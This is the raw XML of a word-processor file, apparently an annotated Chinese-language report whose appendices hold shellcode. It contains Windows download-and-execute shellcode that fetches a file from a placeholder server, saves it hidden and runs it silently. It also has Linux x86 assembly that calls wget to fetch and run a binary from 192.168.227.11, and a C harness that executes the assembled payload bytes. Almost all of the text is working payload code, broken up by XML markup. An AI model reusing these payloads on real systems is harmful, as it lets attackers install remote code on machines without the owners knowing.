        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>server_uri: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db "#{server_uri}", 0x00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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>create_file: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 xml:space="preserve">  jmp.i8 get_filename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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>get_filename_return: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 xml:space="preserve">  xor eax,eax       ; zero eax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pop edi           ; ptr to filename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push eax          ; hTemplateFile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de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  push 2            ; dwFlagsAndAttributes (Hidden)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de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  push 2            ; dwCreationDisposition (CREATE_ALWAYS)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 xml:space="preserve">  push eax          ; lpSecurityAttributes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push 2            ; dwShareMode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push 2            ; dwDesiredAccess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push edi          ; lpFileName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 xml:space="preserve">  push 0x4FDAF6DA   ; kernel32.dll!CreateFileA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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>download_prep: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 xml:space="preserve">  xchg eax, ebx     ; place the file handle in ebx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 xml:space="preserve">  xor eax,eax       ; zero eax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 xml:space="preserve">  mov ax,0x304      ; we'll download 0x300 bytes at a time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 xml:space="preserve">  sub esp,eax       ; reserve space on stack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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>download_more: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push esp          ; &amp;bytesRead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 xml:space="preserve">  lea ecx,[esp+0x8] ; target buffer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 xml:space="preserve">  xor eax,eax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mov ah,0x03       ; eax =&gt; 300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 xml:space="preserve">  push eax          ; read length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 xml:space="preserve">  push ecx          ; target buffer on stack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push esi          ; hRequest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push 0xE2899612   ; hash( "wininet.dll", "InternetReadFile" )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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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 xml:space="preserve">  test eax,eax        ; download failed? (optional?)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 xml:space="preserve">  jz thats_all_folks  ; failure -&gt; exit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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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 xml:space="preserve">  pop eax             ; how many bytes did we retrieve ?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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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test eax,eax        ; optional?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 xml:space="preserve">  je close_and_run    ; continue until it returns 0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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>write_to_file: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push 0              ; lpOverLapped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push esp            ; lpNumberOfBytesWritten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push eax            ; nNumberOfBytesToWrite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 xml:space="preserve">  lea eax,[esp+0xc]   ; get pointer to buffer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push eax            ; lpBuffer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push ebx            ; hFile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push 0x5BAE572D     ; kernel32.dll!WriteFile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将下载数据写入文件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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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 xml:space="preserve">  sub esp,4           ; set stack back to where it was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 xml:space="preserve">  jmp.i8 download_more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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>close_and_run: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 xml:space="preserve">  push ebx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 xml:space="preserve">  push 0x528796C6    ; kernel32.dll!CloseHandle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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>execute_file: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 xml:space="preserve">  push 0             ; don't show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push edi           ; lpCmdLine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push 0x876F8B31    ; kernel32.dll!WinExec  exe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执行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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>thats_all_folks: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de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  #{exitasm}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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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s-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>get_filename: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 xml:space="preserve">  call get_filename_return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db "#{filename}",0x00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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>get_server_host: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 xml:space="preserve">  call internetconnect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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>server_host:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  db "#{server_host}", 0x00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr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附件三：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pP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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  global _start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  <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>section .text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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>_start: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</w:rPr>
        <w:tab/>
        <w:t>;fork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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>xor eax,eax ; eax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寄存器清零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</w:rPr>
        <w:tab/>
        <w:t>mov al,0x2 ; x86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平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>32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位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Linux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系统调用号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#define __NR_fork  2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  <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>int 0x80 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启动系统调用需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>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指令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>linux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系统调用位于中断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>0x80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，执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>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指令时，所有操作转移到内核中的系统调用处理程序，完成后执行转移到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>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指令之后的下一条指令。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  <w:lang w:val="da-DK"/>
        </w:rPr>
        <w:tab/>
        <w:t>xor ebx,ebx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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmp eax,ebx ;ZF=0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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>jz child ;jump if zero(ZF=0)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</w:rPr>
        <w:t xml:space="preserve">      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</w:rPr>
        <w:tab/>
        <w:t>;wait(NULL)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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>xor eax,eax ; eax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寄存器清零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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>mov al,0x7 ; #define __NR_waitpid 7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</w:rPr>
        <w:tab/>
        <w:t>int 0x80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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
        <w:tab/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  <w:lang w:val="da-DK"/>
        </w:rPr>
        <w:tab/>
        <w:t>;chmod x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  <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>xor ecx,ecx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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>xor eax, eax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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push eax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</w:rPr>
        <w:tab/>
        <w:t>mov al, 0xf ;#define __NR_chmod 15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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x78 ; 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：下载文件名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</w:rPr>
        <w:tab/>
        <w:t>mov ebx, esp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  <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:tab/>
        <w:t>xor ecx, ecx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</w:rPr>
        <w:tab/>
        <w:t>mov cx, 0x1ff ; 0x1ff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换算为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0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进制为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>777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，通过按位与运算计算权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue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参数）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</w:rPr>
        <w:tab/>
        <w:t>int 0x80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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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</w:rPr>
        <w:tab/>
        <w:t>;exec x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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>xor eax, eax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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push eax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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x78 ; 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：下载文件名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</w:rPr>
        <w:tab/>
        <w:t>mov ebx, esp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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push eax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</w:rPr>
        <w:tab/>
        <w:t>mov edx, esp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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push ebx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</w:rPr>
        <w:tab/>
        <w:t>mov ecx, esp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</w:rPr>
        <w:tab/>
        <w:t>mov al, 11 ; #define __NR_execve 11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</w:rPr>
        <w:tab/>
        <w:t>int 0x80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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>child: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</w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>;download 192.168.227.11//x with wget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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0xb ; #define __NR_execve 11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  <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:tab/>
        <w:t>pop eax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  <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">cdq 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把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="da-DK"/>
        </w:rPr>
        <w:t>EDX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的所有位都设成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>EAX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最高位的值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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push edx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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x782f2f32</w:t>
        <w:tab/>
        <w:t>;2//x avoid null byte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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x32322e32 ;2.22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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x2e383631 ;168.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x2e323931 ;192.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  <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:tab/>
        <w:t>mov ecx,esp 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保存堆栈指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>X-16-8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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push edx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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x74 ;t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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x6567772f ;egw/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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x6e69622f ;nib/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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push 0x7273752f ;rsu/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</w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">mov ebx,esp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；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>X-42-8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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push edx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</w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push ecx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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>push ebx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</w:rPr>
        <w:tab/>
        <w:t>mov ecx,esp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</w:rPr>
        <w:tab/>
        <w:t>int 0x80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/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pP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附件四：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pP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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>#include&lt;stdio.h&gt;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  <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t>#include&lt;string.h&gt;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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>unsigned char code[] = \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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\x68\x31\x31\x2f\x78\x68\x32\x32\x37\x2e\x68\x31\x36\x38\x2e\x68\x31\x39\x32\x2e\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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</w:rPr>
        <w:tab/>
        <w:t>main()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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>{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</w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>printf("Shellcode Length:  %d\n", strlen(code));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</w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>int (*ret)() = (int(*)())code;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文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 Neue" w:hAnsi="Helvetica Neue"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>ret();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:cs="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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